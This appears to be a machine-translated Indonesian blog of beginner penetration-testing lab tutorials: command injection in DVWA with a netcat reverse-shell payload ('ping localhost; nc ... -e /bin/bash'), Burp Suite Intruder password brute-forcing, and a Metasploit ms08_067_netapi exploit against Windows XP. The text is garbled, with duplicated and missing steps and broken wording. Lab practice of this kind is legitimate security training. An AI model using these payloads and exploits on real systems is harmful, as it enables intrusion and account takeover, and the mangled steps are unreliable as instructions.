TUTTORIAL COMMAND EXECUTION
1. commands enable interaction through the terminal
2.fill in the web browser to search the address ip example 192.168.1.104/dvwa targets and login
3.click command execution
4.fill columns for free to ping localhost; nc 192.168.1.109 1111 -e / bin / bash where the IP is entered our IP, while 1111 is the port that we set and the same as that written on the terminal
5. after clicking submit the display will appear that we've been clicking synchronized between your computer with the target
6. when they are synchronized, the terminal will look like the image around below
2.fill in the web browser to search the address ip example 192.168.1.104/dvwa targets and login
3.click command execution
4.fill columns for free to ping localhost; nc 192.168.1.109 1111 -e / bin / bash where the IP is entered our IP, while 1111 is the port that we set and the same as that written on the terminal
5. after clicking submit the display will appear that we've been clicking synchronized between your computer with the target
6. when they are synchronized, the terminal will look like the image around below
TUTTORIAL BRUPFOST
1.Enable applications through terminal apache2
2.open a web browser and enter the address localhost / dvwa /
3. mysql enabled applications through terminal
4.login dvwa
5.setting the browser to use a proxy dvwa
6.open the application burpsuite
7.the application proxy burpsuite tab enabled intercept
8.login tests and will record the activity in intercep and right click to send it to the intruder tab on port filled with port 8080
9.moved into position and then click the tab in order to clear $ customizable search
10.still on the tab position, in the add $$ to the search we want
11.shifted to the payload tab and enter the words that we think of as a password or username into the column payload option
12.will display a confirmation whether the order was continued
13.after clicking start eating intruder attack on the toolbar will display the results
2.open a web browser and enter the address localhost / dvwa /
3. mysql enabled applications through terminal
4.login dvwa
5.setting the browser to use a proxy dvwa
6.open the application burpsuite
7.the application proxy burpsuite tab enabled intercept
8.login tests and will record the activity in intercep and right click to send it to the intruder tab on port filled with port 8080
9.moved into position and then click the tab in order to clear $ customizable search
10.still on the tab position, in the add $$ to the search we want
11.shifted to the payload tab and enter the words that we think of as a password or username into the column payload option
12.will display a confirmation whether the order was continued
13.after clicking start eating intruder attack on the toolbar will display the results
Rabu, 19 Agustus 2015
Tutorial burp use of force
1. aktifated mysql
2. aktifated apache
3. open dvwa via webbrowser
4. login username and password
5. open the application burp suite with measures Applications> parrot-> web application -> Vunability web scanner
6. in advance klikk tab select manual proxy configuration settings and filled with local ip
7. to intercept the client request in the checklist are part And URL
8.then to the intruder tab and select the position on the column contents dollar barrier between the dollar sign removed is left alone
9.still in tab intruder into the payload. on the payload option, there are many options how to mengimput words. can be directly typed and can be uploaded.
10.then the intruder tab click start atack made to see the results of the brup scanner.
11. to know the password can be seen from the results langth
2. aktifated apache
3. open dvwa via webbrowser
4. login username and password
6. in advance klikk tab select manual proxy configuration settings and filled with local ip
7. to intercept the client request in the checklist are part And URL
8.then to the intruder tab and select the position on the column contents dollar barrier between the dollar sign removed is left alone
9.still in tab intruder into the payload. on the payload option, there are many options how to mengimput words. can be directly typed and can be uploaded.
10.then the intruder tab click start atack made to see the results of the brup scanner.
11. to know the password can be seen from the results langth
Selasa, 18 Agustus 2015
Hack SMB on Windows XP
2. type the command ip # ifconfig to know us
3.type command-r 198.165.56.1/24 #netdiscover
5. open a browser and enter the address https: // localhost: 8834
6. login nussus
7. click new scan
8. click basic network scan
9.contents name with the title of the activity that we carry
10. click save and be taken to the results of our earlier scanning
11. See the list of gaps that could be attacked
12. Select the gap which will be sought truth celahya use metasploit by typing in the terminal #msfconsole
13.Type> use exploit / windows / smb / ms08_067_netapi
14.rhost set by typing the command> set RHOST 192.168.56.101
16. LHOST set by typing the command> set LHOST 192.168.56.1
17. write >exploit
18.hacking windows have been successfully carried out
Tidak ada komentar:
Posting Komentar